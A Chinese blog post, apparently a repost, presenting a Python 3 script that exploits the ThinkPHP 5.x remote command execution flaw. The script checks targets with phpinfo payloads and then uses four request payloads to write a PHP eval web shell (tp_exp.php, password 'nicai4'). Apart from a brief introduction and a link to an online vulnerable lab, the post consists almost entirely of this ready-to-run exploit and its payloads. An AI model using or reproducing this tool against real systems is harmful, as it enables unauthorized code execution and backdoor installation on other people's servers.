侯体宗的博客
  • 首页
  • Hyperf版
  • beego仿版
  • 人生(杂谈)
  • 技术
  • 关于我
  • 更多分类
    • 文件下载
    • 文字修仙
    • 中国象棋ai
    • 群聊
    • 九宫格抽奖
    • 拼图
    • 消消乐
    • 相册

python3编写ThinkPHP命令执行Getshell的方法

Python  /  管理员 发布于 8年前   254

加了三个验证漏洞以及四个getshell方法

# /usr/bin/env python3# -*- coding: utf-8 -*-# @Author: Morker# @Email: [email][email protected][/email]# @Blog:  [url]http://nsf.me/[/url] import requestsimport sys def demo():  print(' _______ _   _    _  _____ _  _ _____ ')  print(' |__  __| |  (_)   | | | __ \| | | | __ \ ')  print('  | | | |__ _ _ __ | | _| |__) | |__| | |__) |')  print('''  | | | '_ \| | '_ \| |/ / ___/| __ | ___/ ''')  print('  | | | | | | | | | |  <| |  | | | | |   ')  print('  |_| |_| |_|_|_| |_|_|\_\_|  |_| |_|_|   ')  print()  print('\tThinkPHP 5.x (v5.0.23 and v5.1.31 following version).')  print('\tRemote command execution exploit.')  print('\tVulnerability verification and getshell.')  print('\tTarget: http://target/public')  print()class ThinkPHP():  def __init__(self,web):    self.web = web    self.headers = {    "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0",    "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",    "Accept-Language" : "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",    "Accept-Encoding" : "gzip, deflate",    "Content-Type" : "application/x-www-form-urlencoded",    "Connection" : "keep-alive"    }   def verification(self):    i = 0    s = 0    verifications = ['/?s=index/\\think\Request/input&filter=phpinfo&data=1','/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1','/?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1']    while True:      if i == len(verifications):        break      else:        url = self.web + verifications[i]        req = requests.get(url=url,headers=self.headers)        if 'phpinfo()' in req.text:          s = 1          break        else:          s = 0        i += 1    if s == 1:      print("[+] There are vulnerabilities.")      print()      toshell = input("[*] Getshell? (y/n):")      if toshell == 'y':        self.getshell()      elif toshell == 'n':        sys.exit()      else:        sys.exit()    else:      print("[-] There are no vulnerabilities.")   def getshell(self):    getshells = [    '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=tp_exp.php&vars[1][]=<?php @eval($_POST[nicai4]); ?>',    '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20@eval($_POST[nicai4]);%20?>%27%20>>%20tp_exp.php',    '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20@eval($_POST[nicai4]);%20?^>%20>>tp_exp.php',    '?s=index/\\think\\template\driver\\file/write&cacheFile=tp_exp.php&content=<?php%20eval($_POST[nicai4]);?>']    shell = self.web + '/tp_exp.php'    i = 0    s = 0    while True:      if i == len(getshells):        break      else:        url = self.web + getshells[i]        req = requests.get(url=url,headers=self.headers)        req_shell = requests.get(url=shell,headers=self.headers)        if req_shell.status_code == 200:          s = 1          break        else:          s = 0        i += 1    if s == 1:      print("[+] WebShell :%s PassWord :nicai4" % shell)    else:      print("[-] The vulnerability does not exist or exists waf.") def main():  demo()  url = input("[*] Please input your target: ")  run = ThinkPHP(url)  run.verification() if __name__ == '__main__':  main()

注:图中的测试网址为在线漏洞环境,可自己去在线搭建测试。

环境地址:https://www.vsplate.com/

效果图:

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持。


  • 上一条:
    ThinkPHP5.1表单令牌Token失效问题的解决
    下一条:
    在nginx中配置pathinfo模式支持thinkphp的URL重写
  • 昵称:

    邮箱:

    0条评论 (评论内容有缓存机制,请悉知!)
    最新最热
    • 分类目录
    • 人生(杂谈)
    • 技术
    • linux
    • Java
    • php
    • 框架(架构)
    • 前端
    • ThinkPHP
    • 数据库
    • 微信(小程序)
    • Laravel
    • Redis
    • Docker
    • Go
    • swoole
    • Windows
    • Python
    • 苹果(mac/ios)
    • 相关文章
    • 在python语言中Flask框架的学习及简单功能示例(0个评论)
    • 在Python语言中实现GUI全屏倒计时代码示例(0个评论)
    • Python + zipfile库实现zip文件解压自动化脚本示例(0个评论)
    • python爬虫BeautifulSoup快速抓取网站图片(1个评论)
    • vscode 配置 python3开发环境的方法(0个评论)
    • 近期文章
    • 智能合约Solidity学习CryptoZombie二课:让你的僵尸猎食(0个评论)
    • 智能合约Solidity学习CryptoZombie第一课:生成一只你的僵尸(0个评论)
    • 在go中实现一个常用的先进先出的缓存淘汰算法示例代码(0个评论)
    • 在go+gin中使用"github.com/skip2/go-qrcode"实现url转二维码功能(0个评论)
    • 在go语言中使用api.geonames.org接口实现根据国际邮政编码获取地址信息功能(1个评论)
    • 在go语言中使用github.com/signintech/gopdf实现生成pdf分页文件功能(0个评论)
    • gmail发邮件报错:534 5.7.9 Application-specific password required...解决方案(0个评论)
    • 欧盟关于强迫劳动的规定的官方举报渠道及官方举报网站(0个评论)
    • 在go语言中使用github.com/signintech/gopdf实现生成pdf文件功能(0个评论)
    • Laravel从Accel获得5700万美元A轮融资(0个评论)
    • 近期评论
    • 122 在

      学历:一种延缓就业设计,生活需求下的权衡之选中评论 工作几年后,报名考研了,到现在还没认真学习备考,迷茫中。作为一名北漂互联网打工人..
    • 123 在

      Clash for Windows作者删库跑路了,github已404中评论 按理说只要你在国内,所有的流量进出都在监控范围内,不管你怎么隐藏也没用,想搞你分..
    • 原梓番博客 在

      在Laravel框架中使用模型Model分表最简单的方法中评论 好久好久都没看友情链接申请了,今天刚看,已经添加。..
    • 博主 在

      佛跳墙vpn软件不会用?上不了网?佛跳墙vpn常见问题以及解决办法中评论 @1111老铁这个不行了,可以看看近期评论的其他文章..
    • 1111 在

      佛跳墙vpn软件不会用?上不了网?佛跳墙vpn常见问题以及解决办法中评论 网站不能打开,博主百忙中能否发个APP下载链接,佛跳墙或极光..
    • 2016-10
    • 2016-11
    • 2018-04
    • 2020-03
    • 2020-04
    • 2020-05
    • 2020-06
    • 2022-01
    • 2023-07
    • 2023-10
    Top

    Copyright·© 2019 侯体宗版权所有· 粤ICP备20027696号 PHP交流群

    侯体宗的博客